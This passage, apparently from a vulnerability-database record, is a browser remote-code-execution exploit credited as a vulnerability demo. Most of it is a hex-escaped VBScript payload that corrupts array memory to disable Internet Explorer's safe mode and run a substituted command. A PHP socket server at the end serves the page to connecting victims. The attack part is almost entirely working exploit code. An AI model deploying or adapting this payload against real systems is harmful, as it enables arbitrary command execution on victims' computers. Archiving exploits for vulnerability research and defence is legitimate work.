72\\x73\\x69\\x6F\\x6E\\x20\\x3D\\x20\\x43\\x49\\x6E\\x74\\x28\\x4D\\x69\\x64\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x20\\x49\\x6E\\x53\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x20\\x22\\x4D\\x53\\x49\\x45\\x22\\x29\\x20\\x2B\\x20\\x35\\x2C\\x20\\x32\\x29\\x29\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x3D\\x30\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x42\\x65\\x67\\x69\\x6E\\x49\\x6E\\x69\\x74\\x28\\x29\\x0D\\x0A\\x20\\x20\\x49\\x66\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x28\\x29\\x3D\\x54\\x72\\x75\\x65\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x3D\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x63\\x68\\x72\\x77\\x28\\x30\\x31\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x32\\x31\\x37\\x36\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x31\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x3D\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x33\\x32\\x37\\x36\\x37\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x29\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x3C\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x77\\x72\\x69\\x74\\x65\\x28\\x22\\x3C\\x62\\x72\\x3E\\x20\\x49\\x45\\x22\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x77\\x72\\x69\\x74\\x65\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x75\\x6E\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x65\\x28\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x73\\x65\\x74\\x6E\\x6F\\x74\\x73\\x61\\x66\\x65\\x6D\\x6F\\x64\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x42\\x65\\x67\\x69\\x6E\\x49\\x6E\\x69\\x74\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x52\\x61\\x6E\\x64\\x6F\\x6D\\x69\\x7A\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x61\\x61\\x28\\x35\\x29\\x0D\\x0A\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x61\\x62\\x28\\x35\\x29\\x0D\\x0A\\x20\\x20\\x20\\x61\\x30\\x3D\\x31\\x33\\x2B\\x31\\x37\\x2A\\x72\\x6E\\x64\\x28\\x36\\x29\\x0D\\x0A\\x20\\x20\\x20\\x61\\x33\\x3D\\x37\\x2B\\x33\\x2A\\x72\\x6E\\x64\\x28\\x35\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x64\\x69\\x6D\\x20\\x69\\x0D\\x0A\\x20\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x3D\\x46\\x61\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x46\\x6F\\x72\\x20\\x69\\x20\\x3D\\x20\\x30\\x20\\x54\\x6F\\x20\\x34\\x30\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x20\\x4F\\x76\\x65\\x72\\x28\\x29\\x3D\\x54\\x72\\x75\\x65\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x3D\\x54\\x72\\x75\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x45\\x78\\x69\\x74\\x20\\x46\\x6F\\x72\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x0D\\x0A\\x20\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x73\\x75\\x62\\x20\\x74\\x65\\x73\\x74\\x61\\x61\\x28\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x73\\x75\\x62\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x6D\\x79\\x64\\x61\\x74\\x61\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x3D\\x74\\x65\\x73\\x74\\x61\\x61\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x3D\\x6E\\x75\\x6C\\x6C\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3D\\x69\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x36\\x2E\\x33\\x36\\x35\\x39\\x38\\x37\\x33\\x37\\x34\\x33\\x37\\x38\\x30\\x31\\x45\\x2D\\x33\\x31\\x34\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x2B\\x32\\x29\\x3D\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x32\\x29\\x3D\\x31\\x2E\\x37\\x34\\x30\\x38\\x38\\x35\\x33\\x34\\x37\\x33\\x31\\x33\\x32\\x34\\x45\\x2D\\x33\\x31\\x30\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x64\\x61\\x74\\x61\\x3D\\x61\\x61\\x28\\x61\\x31\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x73\\x65\\x74\\x6E\\x6F\\x74\\x73\\x61\\x66\\x65\\x6D\\x6F\\x64\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x6D\\x79\\x64\\x61\\x74\\x61\\x28\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x38\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x31\\x36\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x33\\x34\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x66\\x6F\\x72\\x20\\x6B\\x3D\\x30\\x20\\x74\\x6F\\x20\\x26\\x68\\x36\\x30\\x20\\x73\\x74\\x65\\x70\\x20\\x34\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x32\\x30\\x2B\\x6B\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x6A\\x3D\\x31\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x30\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x2B\\x32\\x29\\x28\\x69\\x2B\\x26\\x68\\x31\\x31\\x63\\x2B\\x6B\\x29\\x3D\\x61\\x62\\x28\\x34\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x30\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x32\\x30\\x2B\\x6B\\x29\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x45\\x78\\x69\\x74\\x20\\x66\\x6F\\x72\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x6E\\x65\\x78\\x74\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x32\\x29\\x3D\\x31\\x2E\\x36\\x39\\x37\\x35\\x39\\x36\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2D\\x33\\x31\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x75\\x6E\\x6D\\x75\\x6D\\x61\\x61\\x28\\x29\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x4F\\x76\\x65\\x72\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x64\\x69\\x6D\\x20\\x74\\x79\\x70\\x65\\x31\\x2C\\x74\\x79\\x70\\x65\\x32\\x2C\\x74\\x79\\x70\\x65\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x46\\x61\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x30\\x3D\\x61\\x30\\x2B\\x61\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x31\\x3D\\x61\\x30\\x2B\\x32\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x32\\x3D\\x61\\x30\\x2B\\x26\\x68\\x38\\x30\\x30\\x30\\x30\\x30\\x30\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x62\\x28\\x61\\x30\\x29\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x31\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x31\\x2E\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x3D\\x31\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x3C\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6D\\x65\\x6D\\x3D\\x63\\x69\\x6E\\x74\\x28\\x61\\x30\\x2B\\x31\\x29\\x2A\\x31\\x36\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x28\\x6A\\x3D\\x6D\\x65\\x6D\\x2B\\x34\\x29\\x20\\x6F\\x72\\x20\\x28\\x6A\\x2A\\x38\\x3D\\x6D\\x65\\x6D\\x2B\\x38\\x29\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x3C\\x3E\\x30\\x29\\x20\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x20\\x29\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x56\\x61\\x72\\x54\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x3C\\x3E\\x30\\x29\\x20\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x20\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x56\\x61\\x72\\x54\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x74\\x79\\x70\\x65\\x31\\x3D\\x26\\x68\\x32\\x66\\x36\\x36\\x29\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x54\\x72\\x75\\x65\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x74\\x79\\x70\\x65\\x31\\x3D\\x26\\x68\\x42\\x39\\x41\\x44\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x54\\x72\\x75\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x3D\\x31\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x72\\x75\\x6D\\x28\\x61\\x64\\x64\\x29\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3D\\x61\\x64\\x64\\x2B\\x34\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x31\\x2E\\x36\\x39\\x37\\x35\\x39\\x36\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2D\\x33\\x31\\x33\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x75\\x6D\\x3D\\x6C\\x65\\x6E\\x62\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x2F\\x73\\x63\\x72\\x69\\x70\\x74\\x3E\\x0D\\x0A\\x20\\x3C\\x63\\x65\\x6E\\x74\\x65\\x72\\x3E\\x0D\\x0A\\x20\\x3C\\x73\\x74\\x72\\x6F\\x6E\\x67\\x3E\\x54\\x68\\x69\\x73\\x20\\x69\\x73\\x20\\x61\\x20\\x64\\x65\\x6D\\x6F\\x20\\x66\\x6F\\x72\\x20\\x74\\x68\\x65\\x20\\x76\\x75\\x6C\\x6E\\x65\\x72\\x61\\x62\\x69\\x6C\\x69\\x74\\x79\\x2E\\x3C\\x2F\\x73\\x74\\x72\\x6F\\x6E\\x67\\x3E\\x0D\\x0A\\x20\\x3C\\x62\\x72\\x20\\x2F\\x3E\\x0D\\x0A\\x20\\x3C\\x69\\x3E\\x45\\x68\\x73\\x61\\x6E\\x20\\x4E\\x6F\\x72\\x65\\x64\\x64\\x69\\x6E\\x69\\x20\\x2D\\x20\\x40\\x70\\x72\\x6F\\x74\\x33\\x63\\x74\\x30\\x72\\x3C\\x69\\x3E\\x0D\\x0A\\x20\\x3C\\x62\\x72\\x20\\x2F\\x3E\\x3C\\x69\\x3E\\x65\\x68\\x73\\x61\\x6E\\x6E\\x2E\\x69\\x6E\\x66\\x6F\\x3C\\x2F\\x69\\x3E\\x0D\\x0A\\x20\\x3C\\x2F\\x63\\x65\\x6E\\x74\\x65\\x72\\x3E\\x0D\\x0A\\x3C\\x2F\\x62\\x6F\\x64\\x79\\x3E\\x0D\\x0A\\x3C\\x2F\\x68\\x74\\x6D\\x6C\\x3E\"; \n$msgd=str_replace(\"COMMAND\",$command,$msgd); \nfor (;;) { \nif ($client = @socket_accept($socket)) { \nsocket_write($client, \"HTTP/1.1 200 OK\\r\\n\" . \n\"Content-length: \" . strlen($msgd) . \"\\r\\n\" . \n\"Content-Type: text/html; charset=UTF-8\\r\\n\\r\\n\" . \n$msgd); \nprint \"\\n [+]Sending the exploit to target ... \\r\\n\" ; \n} \nelse usleep(100000); \n} \n \n} \n?> \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/134079/winampbento-exec.txt", "cvss": {"score": 9.3, "vector": 